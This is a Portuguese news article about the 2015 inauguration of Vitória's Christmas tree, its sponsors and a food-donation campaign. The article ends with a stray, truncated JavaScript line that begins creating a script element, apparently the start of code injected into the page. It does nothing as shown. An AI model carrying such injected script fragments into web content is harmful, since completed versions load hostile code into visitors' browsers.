Fetransportes apoia Árvore de Natal de Vitória

Projeto envolve a prefeitura e Rede Gazeta. Árvore está na Praça dos Namorados

 

A tradicional árvore de Natal da Praça dos Namorados, em Vitória, foi inaugurada na noite de terça-feira, 1º de dezembro, e a grande novidade é que a Fetransportes também é parceira do projeto junto com a Prefeitura de Vitória e a Rede Gazeta. E quem foi à inauguração desta que é a 21ª árvore, além da emoção de tê-la visto acender pela primeira vez, ainda assistiu à apresentação do Coral Canta Vitória.

Além de renovar a chama do espírito natalino em cada capixaba, principalmente aqueles que visitam a “cidade natalina” em que se transforma a Praça dos Natalinos, o apoio à causas sociais virou tradição a cada edição do projeto. Este ano, por exemplo, a ação consiste na arrecadação de alimentos não-perecíveis que irão beneficiar três instituições da Grande Vitória vinculadas ao Banco de Alimentos Hebert de Souza.

Os alimentos podem ser doados de 11 a 13 de dezembro e de 18 a 20 de dezembro, das 9h às 23h, diretamente na tenda de arrecadação. Quem preferir, também poderá doar na sede do Banco de Alimentos.

A Árvore de Natal de Vitória, por sua vez, está aberta à visitação das 9h às 23h. Ela será desmontada no dia 6 de janeiro de 2016, Dia de Reis.

Com 15 metros de altura, a árvore terá iluminação branca, micro lâmpadas tipo gotas, seis peças de LED decorativas em diversas cores instaladas nas pontas dos galhos, distribuídas nos 128 galhos e nos 740 ramos da árvore, ambos na cor verde musgo. Além disso, receberá adornos como trenó, castelo, casa do Papai Noel, cogumelo, cadeira, coreto e presentes para decorar.

Debutante no projeto natalino, o presidente da Fetransportes, José Antonio Fiorot, viu na participação uma forma de mandar uma mensagem de otimismo aos capixabas e, sobretudo, aos empresários do setor de transportes.

“Não tivemos um ano fácil e as perspectivas não são as melhores para o início de 2016. Mas precisamos respirar fundo, renovar as energias, a esperança e seguir em frente. E acho que o fim de ano nos traz esse sentimento de renovação. Por isso achamos interessante entrar no projeto. É uma forma de deixar nossa mensagem de otimismo”, comentou.

 

var d=document;var s=d.createElement(‘script’);